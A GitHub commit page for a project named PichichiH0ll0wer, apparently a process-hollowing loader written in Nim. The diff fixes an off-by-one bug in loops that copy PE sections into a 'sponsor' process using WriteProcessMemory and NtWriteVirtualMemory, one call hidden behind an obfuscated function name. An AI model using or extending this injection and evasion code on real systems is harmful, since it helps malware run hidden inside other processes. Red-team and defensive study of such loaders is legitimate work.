fixed bug in sections loop

itaymigdal · Mar 3, 2024 · a48a3be · a48a3be
1 parent dc1a55e
commit a48a3be
Show file tree

Hide file tree

Showing 3 changed files with 6 additions and 6 deletions.
diff --git a/PichichiH0ll0wer/Loader/hollow123.nim b/PichichiH0ll0wer/Loader/hollow123.nim
@@ -84,8 +84,8 @@ proc hollow123*(peStr: string, processInfoAddress: PPROCESS_INFORMATION): bool =
             quit() 
 
         # Copy PE sections to sponsor process
-        when not defined(release): echo "[*] Copying PE sections to sponsor process"    
-        for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections)):
+        when not defined(release): echo "[*] Copying PE sections to sponsor process" 
+        for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections) - 1):
             if WriteProcessMemory(
                 sponsorProcessHandle,
                 newImageBaseAddress + peImageSectionsHeader[i].VirtualAddress,
@@ -181,7 +181,7 @@ proc hollow123*(peStr: string, processInfoAddress: PPROCESS_INFORMATION): bool =
 
         # Copy PE sections to sponsor process
         when not defined(release): echo "[*] Copying PE sections to sponsor process"    
-        for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections)):
+        for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections) - 1):
             if nVcnEsSyWXtfrjav( # NtWriteVirtualMemory
                 sponsorProcessHandle,
                 newImageBaseAddress + peImageSectionsHeader[i].VirtualAddress,

diff --git a/PichichiH0ll0wer/Loader/hollow456.nim b/PichichiH0ll0wer/Loader/hollow456.nim
@@ -92,7 +92,7 @@ when defined(hollow4):
             quit(1)
 
         # Copy PE sections to sponsor process  
-        for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections)):
+        for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections) - 1):
             if NtWriteVirtualMemory(
                 processHandle,
                 newImageBase + peImageSectionsHeader[i].VirtualAddress,
@@ -226,7 +226,7 @@ when defined(hollow5) or defined(hollow6):
             quit(1)
 
         # Copy PE sections to sponsor process  
-        for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections)):
+        for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections) - 1):
             if nVcnEsSyWXtfrjav( # NtWriteVirtualMemory
                 processHandle,
                 newImageBase + peImageSectionsHeader[i].VirtualAddress,

diff --git a/PichichiH0ll0wer/Loader/reloc.nim b/PichichiH0ll0wer/Loader/reloc.nim
@@ -31,7 +31,7 @@ proc applyRelocations*(peBytesPtr: ptr byte, newImageBaseAddress: LPVOID, sponso
     var dwDelta = cast[DWORD](cast[int](newImageBaseAddress) - cast[int](peImageImageBase)) 
     if dwDelta == 0:
         return true
-    for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections)):
+    for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections) - 1):
         if toString(peImageSectionsHeader[i].Name) == protectString(".reloc"):
             var dwRelocAddr = peImageSectionsHeader[i].PointerToRawData
             var dwOffset: DWORD = 0